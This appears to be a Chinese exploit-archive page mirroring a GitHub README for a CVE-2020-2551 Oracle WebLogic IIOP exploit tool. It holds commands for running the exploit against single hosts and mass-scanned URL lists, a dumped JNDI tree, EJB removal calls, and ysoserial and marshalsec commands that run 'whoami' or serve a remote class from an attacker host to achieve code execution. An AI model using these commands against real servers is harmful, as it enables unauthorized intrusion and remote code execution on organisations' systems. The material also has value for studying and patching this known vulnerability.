目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2020-2551 PoC — Oracle Fusion Middleware WebLogic Server 安全漏洞

来源
https://github.com/ar2o3/CVE-Exploit
关联漏洞
标题:Oracle Fusion Middleware WebLogic Server 安全漏洞 (CVE-2020-2551)
Description:Oracle Fusion Middleware(Oracle融合中间件)和Oracle WebLogic Server都是美国甲骨文(Oracle)公司的产品。Oracle Fusion Middleware是一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。Oracle WebLogic Server是一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整
Description
CVE-2020-2551 Exploiter
介绍
Twitter: [@0xAbbarhSF](https://twitter.com/0xAbbarhSF)
[![Tweet](https://img.shields.io/twitter/url/http/0xAbbarhSF.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=myhktools%20-%20Automated%20Pentest%20Recon%20Scanner%20%400xAbbarhSD&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F0xAbbarhSF%2Fmyhktools)


# 1、CVE-2020-2551
CVE-2020-2551 poc exploit python example
keys:
GIOP corba
<img width="588" alt="image" src="https://user-images.githubusercontent.com/18223385/75644021-da372000-5c7b-11ea-8176-b6f911dd4f13.png">


### How use
```
python3 CVE-2020-2551.py -u http://192.168.26.79:7001
cat urls.txt|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
cat xxx.html|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|xargs -I % python3 CVE-2020-2551.py -u %
# 32 Thread check
cat allXXurl.txt|grep -Eo 'http[s]?:\/\/[^ \/]+'|sort -u|python3 CVE-2020-2551.py -e
# now result to data/*.txt
java -cp hktalent_51pwn_com_12.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
java -cp hktalent_51pwn_com_12.2.1.3.0_check.jar testiiop.ExpCVE20202551_names ip:port ip:port
```

### t3, t3s, http, https, iiop, iiops
```
service:jmx:rmi://ip:port/jndi/iiop://ip:port/MBean-server-JNDI-name
service:jmx:iiop://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
service:jmx:t3://ip:port/jndi/weblogic.management.mbeanservers.domainruntime
```

## poc
<img width="695" alt="image" src="https://user-images.githubusercontent.com/18223385/75640403-f0d77a00-5c6f-11ea-92f5-61a6840b8bf3.png">



# 2、your know your do
```
{
    "ejb": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "interfaces": [
            "javax.naming.Context"
        ],
        "mgmt": {
            "MEJB": {
                "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
                "interfaces": []
            },
            "class": "com.sun.jndi.cosnaming.CNCtx",
            "interfaces": [
                "javax.naming.Context"
            ]
        }
    },
    "javax": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "jdbc": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "db_xf": {
            "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
            "interfaces": []
        },
        "interfaces": [
            "javax.naming.Context"
        ]
    },
    "mejbmejb_jarMejb_EO": {
        "class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
        "interfaces": []
    },
    "weblogic": {
        "class": "com.sun.jndi.cosnaming.CNCtx",
        "error msg": "org.omg.CORBA.NO_PERMISSION:   vmcid: 0x0  minor code: 0  completed: No",
        "interfaces": [
            "javax.naming.Context"
        ]
    }
}
```

# 3、ejb
```
/bea_wls_internal/classes/mejb@/

weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)
```

# 4、jta
```
x.lookup("ejb/mgmt/MEJB").remove(jta);
```
# 5、logs
- fix rmi use Jdk7u21 payload,not work for remote jdk8
don‘t use
```
java -cp $mtx/../tools/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 'whoami'
```
use,XXclass.class from jdk6 build
```
java -cp $mtx/../tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer 'http://YourIP:port/#XXclass' 1099
```
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →